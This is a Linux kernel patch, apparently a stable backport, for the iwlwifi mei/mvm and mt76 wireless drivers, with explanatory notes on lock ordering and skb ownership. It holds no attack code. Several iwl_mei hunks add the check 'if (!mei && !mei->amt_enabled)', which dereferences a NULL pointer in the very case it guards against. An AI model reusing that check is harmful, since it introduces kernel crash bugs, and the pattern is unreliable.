+ 	set_bit(IWL_MEI_STATUS_SAP_CONNECTED, &iwl_mei_status);
+-	/* wifi driver has registered already */
+-	if (iwl_mei_cache.ops) {
+-		iwl_mei_send_sap_msg(mei->cldev,
+-				     SAP_MSG_NOTIF_WIFIDR_UP);
+-		iwl_mei_cache.ops->sap_connected(iwl_mei_cache.priv);
+-	}
+-
++	/*
++	 * We'll receive AMT_STATE SAP message in a bit and
++	 * that will continue the flow
++	 */
+ 	mutex_unlock(&iwl_mei_mutex);
+ }
+ 
+@@ -712,6 +740,13 @@ static void iwl_mei_set_init_conf(struct iwl_mei *mei)
+ 		.val = cpu_to_le32(iwl_mei_cache.rf_kill),
+ 	};
+ 
++	/* wifi driver has registered already */
++	if (iwl_mei_cache.ops) {
++		iwl_mei_send_sap_msg(mei->cldev,
++				     SAP_MSG_NOTIF_WIFIDR_UP);
++		iwl_mei_cache.ops->sap_connected(iwl_mei_cache.priv);
++	}
++
+ 	iwl_mei_send_sap_msg(mei->cldev, SAP_MSG_NOTIF_WHO_OWNS_NIC);
+ 
+ 	if (iwl_mei_cache.conn_info) {
+@@ -738,38 +773,23 @@ static void iwl_mei_handle_amt_state(struct mei_cl_device *cldev,
+ 				     const struct iwl_sap_msg_dw *dw)
+ {
+ 	struct iwl_mei *mei = mei_cldev_get_drvdata(cldev);
+-	struct net_device *netdev;
+ 
+-	/*
+-	 * First take rtnl and only then the mutex to avoid an ABBA
+-	 * with iwl_mei_set_netdev()
+-	 */
+-	rtnl_lock();
+ 	mutex_lock(&iwl_mei_mutex);
+ 
+-	netdev = rcu_dereference_protected(iwl_mei_cache.netdev,
+-					   lockdep_is_held(&iwl_mei_mutex));
+-
+ 	if (mei->amt_enabled == !!le32_to_cpu(dw->val))
+ 		goto out;
+ 
+ 	mei->amt_enabled = dw->val;
+ 
+-	if (mei->amt_enabled) {
+-		if (netdev)
+-			netdev_rx_handler_register(netdev, iwl_mei_rx_handler, mei);
+-
++	if (mei->amt_enabled)
+ 		iwl_mei_set_init_conf(mei);
+-	} else {
+-		if (iwl_mei_cache.ops)
+-			iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, false);
+-		if (netdev)
+-			netdev_rx_handler_unregister(netdev);
+-	}
++	else if (iwl_mei_cache.ops)
++		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, false, false);
++
++	schedule_work(&mei->netdev_work);
+ 
+ out:
+ 	mutex_unlock(&iwl_mei_mutex);
+-	rtnl_unlock();
+ }
+ 
+ static void iwl_mei_handle_nic_owner(struct mei_cl_device *cldev,
+@@ -798,14 +818,18 @@ static void iwl_mei_handle_csme_taking_ownership(struct mei_cl_device *cldev,
+ 
+ 	mei->got_ownership = false;
+ 
+-	/*
+-	 * Remember to send CSME_OWNERSHIP_CONFIRMED when the wifi driver
+-	 * is finished taking the device down.
+-	 */
+-	mei->csme_taking_ownership = true;
++	if (iwl_mei_cache.ops && !mei->device_down) {
++		/*
++		 * Remember to send CSME_OWNERSHIP_CONFIRMED when the wifi
++		 * driver is finished taking the device down.
++		 */
++		mei->csme_taking_ownership = true;
+ 
+-	if (iwl_mei_cache.ops)
+-		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, true);
++		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, true, true);
++	} else {
++		iwl_mei_send_sap_msg(cldev,
++				     SAP_MSG_NOTIF_CSME_OWNERSHIP_CONFIRMED);
++	}
+ }
+ 
+ static void iwl_mei_handle_nvm(struct mei_cl_device *cldev,
+@@ -1413,10 +1437,7 @@ void iwl_mei_host_associated(const struct iwl_mei_conn_info *conn_info,
+ 
+ 	mei = mei_cldev_get_drvdata(iwl_mei_global_cldev);
+ 
+-	if (!mei)
+-		goto out;
+-
+-	if (!mei->amt_enabled)
++	if (!mei && !mei->amt_enabled)
+ 		goto out;
+ 
+ 	iwl_mei_send_sap_msg_payload(mei->cldev, &msg.hdr);
+@@ -1445,7 +1466,7 @@ void iwl_mei_host_disassociated(void)
+ 
+ 	mei = mei_cldev_get_drvdata(iwl_mei_global_cldev);
+ 
+-	if (!mei)
++	if (!mei && !mei->amt_enabled)
+ 		goto out;
+ 
+ 	iwl_mei_send_sap_msg_payload(mei->cldev, &msg.hdr);
+@@ -1481,7 +1502,7 @@ void iwl_mei_set_rfkill_state(bool hw_rfkill, bool sw_rfkill)
+ 
+ 	mei = mei_cldev_get_drvdata(iwl_mei_global_cldev);
+ 
+-	if (!mei)
++	if (!mei && !mei->amt_enabled)
+ 		goto out;
+ 
+ 	iwl_mei_send_sap_msg_payload(mei->cldev, &msg.hdr);
+@@ -1510,7 +1531,7 @@ void iwl_mei_set_nic_info(const u8 *mac_address, const u8 *nvm_address)
+ 
+ 	mei = mei_cldev_get_drvdata(iwl_mei_global_cldev);
+ 
+-	if (!mei)
++	if (!mei && !mei->amt_enabled)
+ 		goto out;
+ 
+ 	iwl_mei_send_sap_msg_payload(mei->cldev, &msg.hdr);
+@@ -1538,7 +1559,7 @@ void iwl_mei_set_country_code(u16 mcc)
+ 
+ 	mei = mei_cldev_get_drvdata(iwl_mei_global_cldev);
+ 
+-	if (!mei)
++	if (!mei && !mei->amt_enabled)
+ 		goto out;
+ 
+ 	iwl_mei_send_sap_msg_payload(mei->cldev, &msg.hdr);
+@@ -1564,7 +1585,7 @@ void iwl_mei_set_power_limit(const __le16 *power_limit)
+ 
+ 	mei = mei_cldev_get_drvdata(iwl_mei_global_cldev);
+ 
+-	if (!mei)
++	if (!mei && !mei->amt_enabled)
+ 		goto out;
+ 
+ 	memcpy(msg.sar_chain_info_table, power_limit, sizeof(msg.sar_chain_info_table));
+@@ -1616,7 +1637,7 @@ out:
+ }
+ EXPORT_SYMBOL_GPL(iwl_mei_set_netdev);
+ 
+-void iwl_mei_device_down(void)
++void iwl_mei_device_state(bool up)
+ {
+ 	struct iwl_mei *mei;
+ 
+@@ -1630,7 +1651,9 @@ void iwl_mei_device_down(void)
+ 	if (!mei)
+ 		goto out;
+ 
+-	if (!mei->csme_taking_ownership)
++	mei->device_down = !up;
++
++	if (up || !mei->csme_taking_ownership)
+ 		goto out;
+ 
+ 	iwl_mei_send_sap_msg(mei->cldev,
+@@ -1639,7 +1662,7 @@ void iwl_mei_device_down(void)
+ out:
+ 	mutex_unlock(&iwl_mei_mutex);
+ }
+-EXPORT_SYMBOL_GPL(iwl_mei_device_down);
++EXPORT_SYMBOL_GPL(iwl_mei_device_state);
+ 
+ int iwl_mei_register(void *priv, const struct iwl_mei_ops *ops)
+ {
+@@ -1669,9 +1692,10 @@ int iwl_mei_register(void *priv, const struct iwl_mei_ops *ops)
+ 
+ 		/* we have already a SAP connection */
+ 		if (iwl_mei_is_connected()) {
+-			iwl_mei_send_sap_msg(mei->cldev,
+-					     SAP_MSG_NOTIF_WIFIDR_UP);
+-			ops->rfkill(priv, mei->link_prot_state);
++			if (mei->amt_enabled)
++				iwl_mei_send_sap_msg(mei->cldev,
++						     SAP_MSG_NOTIF_WIFIDR_UP);
++			ops->rfkill(priv, mei->link_prot_state, false);
+ 		}
+ 	}
+ 	ret = 0;
+@@ -1818,9 +1842,11 @@ static int iwl_mei_probe(struct mei_cl_device *cldev,
+ 			  iwl_mei_csa_throttle_end_wk);
+ 	init_waitqueue_head(&mei->get_ownership_wq);
+ 	spin_lock_init(&mei->data_q_lock);
++	INIT_WORK(&mei->netdev_work, iwl_mei_netdev_work);
+ 
+ 	mei_cldev_set_drvdata(cldev, mei);
+ 	mei->cldev = cldev;
++	mei->device_down = true;
+ 
+ 	do {
+ 		ret = iwl_mei_alloc_shared_mem(cldev);
+@@ -1921,29 +1947,32 @@ static void iwl_mei_remove(struct mei_cl_device *cldev)
+ 
+ 	mutex_lock(&iwl_mei_mutex);
+ 
+-	/*
+-	 * Tell CSME that we are going down so that it won't access the
+-	 * memory anymore, make sure this message goes through immediately.
+-	 */
+-	mei->csa_throttled = false;
+-	iwl_mei_send_sap_msg(mei->cldev,
+-			     SAP_MSG_NOTIF_HOST_GOES_DOWN);
++	if (mei->amt_enabled) {
++		/*
++		 * Tell CSME that we are going down so that it won't access the
++		 * memory anymore, make sure this message goes through immediately.
++		 */
++		mei->csa_throttled = false;
++		iwl_mei_send_sap_msg(mei->cldev,
++				     SAP_MSG_NOTIF_HOST_GOES_DOWN);
+ 
+-	for (i = 0; i < SEND_SAP_MAX_WAIT_ITERATION; i++) {
+-		if (!iwl_mei_host_to_me_data_pending(mei))
+-			break;
++		for (i = 0; i < SEND_SAP_MAX_WAIT_ITERATION; i++) {
++			if (!iwl_mei_host_to_me_data_pending(mei))
++				break;
+ 
+-		msleep(5);
+-	}
++			msleep(20);
++		}
+ 
+-	/*
+-	 * If we couldn't make sure that CSME saw the HOST_GOES_DOWN message,
+-	 * it means that it will probably keep reading memory that we are going
+-	 * to unmap and free, expect IOMMU error messages.
+-	 */
+-	if (i == SEND_SAP_MAX_WAIT_ITERATION)
+-		dev_err(&mei->cldev->dev,
+-			"Couldn't get ACK from CSME on HOST_GOES_DOWN message\n");
++		/*
++		 * If we couldn't make sure that CSME saw the HOST_GOES_DOWN
++		 * message, it means that it will probably keep reading memory
++		 * that we are going to unmap and free, expect IOMMU error
++		 * messages.
++		 */
++		if (i == SEND_SAP_MAX_WAIT_ITERATION)
++			dev_err(&mei->cldev->dev,
++				"Couldn't get ACK from CSME on HOST_GOES_DOWN message\n");
++	}
+ 
+ 	mutex_unlock(&iwl_mei_mutex);
+ 
+@@ -1976,6 +2005,7 @@ static void iwl_mei_remove(struct mei_cl_device *cldev)
+ 	 */
+ 	cancel_work_sync(&mei->send_csa_msg_wk);
+ 	cancel_delayed_work_sync(&mei->csa_throttle_end_wk);
++	cancel_work_sync(&mei->netdev_work);
+ 
+ 	/*
+ 	 * If someone waits for the ownership, let him know that we are going
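
The biggest structural change in the iwlwifi/mei diff is moving netdev_rx_handler_register()/unregister() out of the SAP message handler into a dedicated work item. The handler runs under iwl_mei_mutex while the rx-handler calls need rtnl, and iwl_mei_set_netdev() takes the two locks in the opposite order, which is the ABBA deadlock the in-code comments mention; deferring to a work item that always takes rtnl first preserves a single global lock order. The idiom in miniature, with hypothetical names:

        #include <linux/mutex.h>
        #include <linux/rtnetlink.h>
        #include <linux/workqueue.h>

        static DEFINE_MUTEX(foo_mutex);

        struct foo_dev {
                struct work_struct netdev_work;
        };

        static void foo_netdev_work(struct work_struct *wk)
        {
                rtnl_lock();            /* global order: rtnl, then foo_mutex */
                mutex_lock(&foo_mutex);

                /* safe to register/unregister rx handlers here */

                mutex_unlock(&foo_mutex);
                rtnl_unlock();
        }

        static void foo_msg_handler(struct foo_dev *fd)
        {
                mutex_lock(&foo_mutex);
                /* ... update state ... */
                schedule_work(&fd->netdev_work); /* never take rtnl under foo_mutex */
                mutex_unlock(&foo_mutex);
        }
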
+diff --git a/drivers/net/wireless/intel/iwlwifi/mei/net.c b/drivers/net/wireless/intel/iwlwifi/mei/net.c
+index 3472167c83707..eac46d1a397a8 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mei/net.c
++++ b/drivers/net/wireless/intel/iwlwifi/mei/net.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ /*
+- * Copyright (C) 2021 Intel Corporation
++ * Copyright (C) 2021-2022 Intel Corporation
+  */
+ 
+ #include <uapi/linux/if_ether.h>
+@@ -337,10 +337,14 @@ rx_handler_result_t iwl_mei_rx_filter(struct sk_buff *orig_skb,
+ 	if (!*pass_to_csme)
+ 		return RX_HANDLER_PASS;
+ 
+-	if (ret == RX_HANDLER_PASS)
++	if (ret == RX_HANDLER_PASS) {
+ 		skb = skb_copy(orig_skb, GFP_ATOMIC);
+-	else
++
++		if (!skb)
++			return RX_HANDLER_PASS;
++	} else {
+ 		skb = orig_skb;
++	}
+ 
+ 	/* CSME wants the MAC header as well, push it back */
+ 	skb_push(skb, skb->data - skb_mac_header(skb));
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+index f041e77af059e..5de34edc51fe9 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+@@ -1665,6 +1665,8 @@ int iwl_mvm_up(struct iwl_mvm *mvm)
+ 			iwl_rfi_send_config_cmd(mvm, NULL);
+ 	}
+ 
++	iwl_mvm_mei_device_state(mvm, true);
++
+ 	IWL_DEBUG_INFO(mvm, "RT uCode started.\n");
+ 	return 0;
+  error:
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h b/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
+index 97cba526e4651..1ccb3cad7cdc1 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
+@@ -2201,10 +2201,10 @@ static inline void iwl_mvm_mei_host_disassociated(struct iwl_mvm *mvm)
+ 		iwl_mei_host_disassociated();
+ }
+ 
+-static inline void iwl_mvm_mei_device_down(struct iwl_mvm *mvm)
++static inline void iwl_mvm_mei_device_state(struct iwl_mvm *mvm, bool up)
+ {
+ 	if (mvm->mei_registered)
+-		iwl_mei_device_down();
++		iwl_mei_device_state(up);
+ }
+ 
+ static inline void iwl_mvm_mei_set_sw_rfkill_state(struct iwl_mvm *mvm)
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+index d2d42cd48af22..5b8e9a06f6d4a 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+@@ -1375,7 +1375,7 @@ void iwl_mvm_stop_device(struct iwl_mvm *mvm)
+ 	iwl_trans_stop_device(mvm->trans);
+ 	iwl_free_fw_paging(&mvm->fwrt);
+ 	iwl_fw_dump_conf_clear(&mvm->fwrt);
+-	iwl_mvm_mei_device_down(mvm);
++	iwl_mvm_mei_device_state(mvm, false);
+ }
+ 
+ static void iwl_op_mode_mvm_stop(struct iwl_op_mode *op_mode)
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+index 86d20e13bf47a..ba944175546d4 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+@@ -1171,9 +1171,15 @@ static int iwl_mvm_tx_mpdu(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 	/* From now on, we cannot access info->control */
+ 	iwl_mvm_skb_prepare_status(skb, dev_cmd);
+ 
++	/*
++	 * The IV is introduced by the HW for new tx api, and it is not present
++	 * in the skb, hence, don't tell iwl_mvm_mei_tx_copy_to_csme about the
++	 * IV for those devices.
++	 */
+ 	if (ieee80211_is_data(fc))
+ 		iwl_mvm_mei_tx_copy_to_csme(mvm, skb,
+-					    info->control.hw_key ?
++					    info->control.hw_key &&
++					    !iwl_mvm_has_new_tx_api(mvm) ?
+ 					    info->control.hw_key->iv_len : 0);
+ 
+ 	if (iwl_trans_tx(mvm->trans, skb, dev_cmd, txq_id))
+@@ -1206,6 +1212,7 @@ int iwl_mvm_tx_skb_sta(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 	struct sk_buff_head mpdus_skbs;
+ 	unsigned int payload_len;
+ 	int ret;
++	struct sk_buff *orig_skb = skb;
+ 
+ 	if (WARN_ON_ONCE(!mvmsta))
+ 		return -1;
+@@ -1238,8 +1245,17 @@ int iwl_mvm_tx_skb_sta(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 
+ 		ret = iwl_mvm_tx_mpdu(mvm, skb, &info, sta);
+ 		if (ret) {
++			/* Free skbs created as part of TSO logic that have not yet been dequeued */
+ 			__skb_queue_purge(&mpdus_skbs);
+-			return ret;
++			/* skb here is not necessarily same as skb that entered this method,
++			 * so free it explicitly.
++			 */
++			if (skb == orig_skb)
++				ieee80211_free_txskb(mvm->hw, skb);
++			else
++				kfree_skb(skb);
++			/* there was error, but we consumed skb one way or another, so return 0 */
++			return 0;
+ 		}
+ 	}
+ 
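
The tx.c hunk encodes mac80211's ownership contract: once a frame enters the driver's tx path it must be consumed, success or not, and after TSO splitting the skb in hand may no longer be the one the stack submitted. Hence the fix frees whichever skb failed (ieee80211_free_txskb() for the original, so mac80211 can account for it; plain kfree_skb() for driver-built segments) and reports 0. The contract in miniature, with a hypothetical enqueue helper:

        #include <net/mac80211.h>

        static int foo_hw_enqueue(struct sk_buff *skb);    /* hypothetical */

        static int foo_tx(struct ieee80211_hw *hw, struct sk_buff *skb)
        {
                struct sk_buff *orig_skb = skb;

                /* ... skb may be swapped for a TSO segment here ... */

                if (foo_hw_enqueue(skb) < 0) {
                        if (skb == orig_skb)
                                ieee80211_free_txskb(hw, skb); /* mac80211-aware free */
                        else
                                kfree_skb(skb);                /* driver-built segment */
                        return 0;       /* skb consumed despite the error */
                }
                return 0;
        }
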
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76.h b/drivers/net/wireless/mediatek/mt76/mt76.h
+index 87db9498dea44..7bcf7a6b67df3 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76.h
+@@ -1107,8 +1107,9 @@ static inline bool mt76_is_skb_pktid(u8 pktid)
+ static inline u8 mt76_tx_power_nss_delta(u8 nss)
+ {
+ 	static const u8 nss_delta[4] = { 0, 6, 9, 12 };
++	u8 idx = nss - 1;
+ 
+-	return nss_delta[nss - 1];
++	return (idx < ARRAY_SIZE(nss_delta)) ? nss_delta[idx] : 0;
+ }
+ 
+ static inline bool mt76_testmode_enabled(struct mt76_phy *phy)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+index 011fc9729b38c..025a237c1cce8 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+@@ -2834,6 +2834,9 @@ mt76_connac_mcu_send_ram_firmware(struct mt76_dev *dev,
+ 		len = le32_to_cpu(region->len);
+ 		addr = le32_to_cpu(region->addr);
+ 
++		if (region->feature_set & FW_FEATURE_NON_DL)
++			goto next;
++
+ 		if (region->feature_set & FW_FEATURE_OVERRIDE_ADDR)
+ 			override = addr;
+ 
+@@ -2850,6 +2853,7 @@ mt76_connac_mcu_send_ram_firmware(struct mt76_dev *dev,
+ 			return err;
+ 		}
+ 
++next:
+ 		offset += len;
+ 	}
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
+index 4b1a9811646fd..0bce0ce51be00 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
+@@ -173,60 +173,50 @@ static void mt7915_eeprom_parse_band_config(struct mt7915_phy *phy)
+ void mt7915_eeprom_parse_hw_cap(struct mt7915_dev *dev,
+ 				struct mt7915_phy *phy)
+ {
+-	u8 nss, nss_band, nss_band_max, *eeprom = dev->mt76.eeprom.data;
++	u8 path, nss, nss_max = 4, *eeprom = dev->mt76.eeprom.data;
+ 	struct mt76_phy *mphy = phy->mt76;
+-	bool ext_phy = phy != &dev->phy;
+ 
+ 	mt7915_eeprom_parse_band_config(phy);
+ 
+-	/* read tx/rx mask from eeprom */
++	/* read tx/rx path from eeprom */
+ 	if (is_mt7915(&dev->mt76)) {
+-		nss = FIELD_GET(MT_EE_WIFI_CONF0_TX_PATH,
+-				eeprom[MT_EE_WIFI_CONF]);
++		path = FIELD_GET(MT_EE_WIFI_CONF0_TX_PATH,
++				 eeprom[MT_EE_WIFI_CONF]);
+ 	} else {
+-		nss = FIELD_GET(MT_EE_WIFI_CONF0_TX_PATH,
+-				eeprom[MT_EE_WIFI_CONF + phy->band_idx]);
++		path = FIELD_GET(MT_EE_WIFI_CONF0_TX_PATH,
++				 eeprom[MT_EE_WIFI_CONF + phy->band_idx]);
+ 	}
+ 
+-	if (!nss || nss > 4)
+-		nss = 4;
++	if (!path || path > 4)
++		path = 4;
+ 
+ 	/* read tx/rx stream */
+-	nss_band = nss;
+-
++	nss = path;
+ 	if (dev->dbdc_support) {
+ 		if (is_mt7915(&dev->mt76)) {
+-			nss_band = FIELD_GET(MT_EE_WIFI_CONF3_TX_PATH_B0,
+-					     eeprom[MT_EE_WIFI_CONF + 3]);
++			path = min_t(u8, path, 2);
++			nss = FIELD_GET(MT_EE_WIFI_CONF3_TX_PATH_B0,
++					eeprom[MT_EE_WIFI_CONF + 3]);
+ 			if (phy->band_idx)
+-				nss_band = FIELD_GET(MT_EE_WIFI_CONF3_TX_PATH_B1,
+-						     eeprom[MT_EE_WIFI_CONF + 3]);
++				nss = FIELD_GET(MT_EE_WIFI_CONF3_TX_PATH_B1,
++						eeprom[MT_EE_WIFI_CONF + 3]);
+ 		} else {
+-			nss_band = FIELD_GET(MT_EE_WIFI_CONF_STREAM_NUM,
+-					     eeprom[MT_EE_WIFI_CONF + 2 + phy->band_idx]);
++			nss = FIELD_GET(MT_EE_WIFI_CONF_STREAM_NUM,
++					eeprom[MT_EE_WIFI_CONF + 2 + phy->band_idx]);
+ 		}
+ 
+-		nss_band_max = is_mt7986(&dev->mt76) ?
+-			       MT_EE_NSS_MAX_DBDC_MA7986 : MT_EE_NSS_MAX_DBDC_MA7915;
+-	} else {
+-		nss_band_max = is_mt7986(&dev->mt76) ?
+-			       MT_EE_NSS_MAX_MA7986 : MT_EE_NSS_MAX_MA7915;
++		if (!is_mt7986(&dev->mt76))
++			nss_max = 2;
+ 	}
+ 
+-	if (!nss_band || nss_band > nss_band_max)
+-		nss_band = nss_band_max;
+-
+-	if (nss_band > nss) {
+-		dev_warn(dev->mt76.dev,
+-			 "nss mismatch, nss(%d) nss_band(%d) band(%d) ext_phy(%d)\n",
+-			 nss, nss_band, phy->band_idx, ext_phy);
+-		nss = nss_band;
+-	}
++	if (!nss)
++		nss = nss_max;
++	nss = min_t(u8, min_t(u8, nss_max, nss), path);
+ 
+-	mphy->chainmask = BIT(nss) - 1;
+-	if (ext_phy)
++	mphy->chainmask = BIT(path) - 1;
++	if (phy->band_idx)
+ 		mphy->chainmask <<= dev->chainshift;
+-	mphy->antenna_mask = BIT(nss_band) - 1;
++	mphy->antenna_mask = BIT(nss) - 1;
+ 	dev->chainmask |= mphy->chainmask;
+ 	dev->chainshift = hweight8(dev->mphy.chainmask);
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.h b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.h
+index 7578ac6d0be62..f3e56817d36e9 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.h
+@@ -58,11 +58,6 @@ enum mt7915_eeprom_field {
+ #define MT_EE_RATE_DELTA_SIGN			BIT(6)
+ #define MT_EE_RATE_DELTA_EN			BIT(7)
+ 
+-#define MT_EE_NSS_MAX_MA7915			4
+-#define MT_EE_NSS_MAX_DBDC_MA7915		2
+-#define MT_EE_NSS_MAX_MA7986			4
+-#define MT_EE_NSS_MAX_DBDC_MA7986		4
+-
+ enum mt7915_adie_sku {
+ 	MT7976_ONE_ADIE_DBDC = 0x7,
+ 	MT7975_ONE_ADIE	= 0x8,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mac.c b/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
+index a4bcc617c1a34..e6bf6e04d4b9c 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
+@@ -1151,7 +1151,7 @@ void mt7915_mac_set_timing(struct mt7915_phy *phy)
+ 		  FIELD_PREP(MT_TIMEOUT_VAL_CCA, 48);
+ 	u32 ofdm = FIELD_PREP(MT_TIMEOUT_VAL_PLCP, 60) |
+ 		   FIELD_PREP(MT_TIMEOUT_VAL_CCA, 28);
+-	int offset;
++	int eifs_ofdm = 360, sifs = 10, offset;
+ 	bool a_band = !(phy->mt76->chandef.chan->band == NL80211_BAND_2GHZ);
+ 
+ 	if (!test_bit(MT76_STATE_RUNNING, &phy->mt76->state))
+@@ -1169,17 +1169,26 @@ void mt7915_mac_set_timing(struct mt7915_phy *phy)
+ 	reg_offset = FIELD_PREP(MT_TIMEOUT_VAL_PLCP, offset) |
+ 		     FIELD_PREP(MT_TIMEOUT_VAL_CCA, offset);
+ 
++	if (!is_mt7915(&dev->mt76)) {
++		if (!a_band) {
++			mt76_wr(dev, MT_TMAC_ICR1(phy->band_idx),
++				FIELD_PREP(MT_IFS_EIFS_CCK, 314));
++			eifs_ofdm = 78;
++		} else {
++			eifs_ofdm = 84;
++		}
++	} else if (a_band) {
++		sifs = 16;
++	}
++
+ 	mt76_wr(dev, MT_TMAC_CDTR(phy->band_idx), cck + reg_offset);
+ 	mt76_wr(dev, MT_TMAC_ODTR(phy->band_idx), ofdm + reg_offset);
+ 	mt76_wr(dev, MT_TMAC_ICR0(phy->band_idx),
+-		FIELD_PREP(MT_IFS_EIFS_OFDM, a_band ? 84 : 78) |
++		FIELD_PREP(MT_IFS_EIFS_OFDM, eifs_ofdm) |
+ 		FIELD_PREP(MT_IFS_RIFS, 2) |
+-		FIELD_PREP(MT_IFS_SIFS, 10) |
++		FIELD_PREP(MT_IFS_SIFS, sifs) |
+ 		FIELD_PREP(MT_IFS_SLOT, phy->slottime));
+ 
+-	mt76_wr(dev, MT_TMAC_ICR1(phy->band_idx),
+-		FIELD_PREP(MT_IFS_EIFS_CCK, 314));
+-
+ 	if (phy->slottime < 20 || a_band)
+ 		val = MT7915_CFEND_RATE_DEFAULT;
+ 	else
+@@ -1600,7 +1609,7 @@ void mt7915_mac_update_stats(struct mt7915_phy *phy)
+ 
+ 	aggr0 = phy->band_idx ? ARRAY_SIZE(dev->mt76.aggr_stats) / 2 : 0;
+ 	if (is_mt7915(&dev->mt76)) {
+-		for (i = 0, aggr1 = aggr0 + 4; i < 4; i++) {
++		for (i = 0, aggr1 = aggr0 + 8; i < 4; i++) {
+ 			val = mt76_rr(dev, MT_MIB_MB_SDR1(phy->band_idx, (i << 4)));
+ 			mib->ba_miss_cnt +=
+ 				FIELD_GET(MT_MIB_BA_MISS_COUNT_MASK, val);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/pci.c b/drivers/net/wireless/mediatek/mt76/mt7915/pci.c
+index 728a879c3b008..3808ce1647d9e 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/pci.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/pci.c
+@@ -65,10 +65,17 @@ static void mt7915_put_hif2(struct mt7915_hif *hif)
+ 
+ static struct mt7915_hif *mt7915_pci_init_hif2(struct pci_dev *pdev)
+ {
++	struct pci_dev *tmp_pdev;
++
+ 	hif_idx++;
+-	if (!pci_get_device(PCI_VENDOR_ID_MEDIATEK, 0x7916, NULL) &&
+-	    !pci_get_device(PCI_VENDOR_ID_MEDIATEK, 0x790a, NULL))
+-		return NULL;
++
++	tmp_pdev = pci_get_device(PCI_VENDOR_ID_MEDIATEK, 0x7916, NULL);
++	if (!tmp_pdev) {
++		tmp_pdev = pci_get_device(PCI_VENDOR_ID_MEDIATEK, 0x790a, NULL);
++		if (!tmp_pdev)
++			return NULL;
++	}
++	pci_dev_put(tmp_pdev);
+ 
+ 	writel(hif_idx | MT_PCIE_RECOG_ID_SEM,
+ 	       pcim_iomap_table(pdev)[0] + MT_PCIE_RECOG_ID);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/init.c b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+index dcdb3cf04ac1b..4ad66b3443838 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+@@ -37,6 +37,7 @@ mt7921_regd_notifier(struct wiphy *wiphy,
+ 
+ 	memcpy(dev->mt76.alpha2, request->alpha2, sizeof(dev->mt76.alpha2));
+ 	dev->mt76.region = request->dfs_region;
++	dev->country_ie_env = request->country_ie_env;
+ 
+ 	mt7921_mutex_acquire(dev);
+ 	mt7921_mcu_set_clc(dev, request->alpha2, request->country_ie_env);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mac.c b/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
+index 650ab97ae0524..1c0d8cf19b8eb 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
+@@ -396,6 +396,27 @@ mt7921_mac_fill_rx(struct mt7921_dev *dev, struct sk_buff *skb)
+ 		if (v0 & MT_PRXV_HT_AD_CODE)
+ 			status->enc_flags |= RX_ENC_FLAG_LDPC;
+ 
++		ret = mt76_connac2_mac_fill_rx_rate(&dev->mt76, status, sband,
++						    rxv, &mode);
++		if (ret < 0)
++			return ret;
++
++		if (rxd1 & MT_RXD1_NORMAL_GROUP_5) {
++			rxd += 6;
++			if ((u8 *)rxd - skb->data >= skb->len)
++				return -EINVAL;
++
++			rxv = rxd;
++			/* Monitor mode would use RCPI described in GROUP 5
++			 * instead.
++			 */
++			v1 = le32_to_cpu(rxv[0]);
++
++			rxd += 12;
++			if ((u8 *)rxd - skb->data >= skb->len)
++				return -EINVAL;
++		}
++
+ 		status->chains = mphy->antenna_mask;
+ 		status->chain_signal[0] = to_rssi(MT_PRXV_RCPI0, v1);
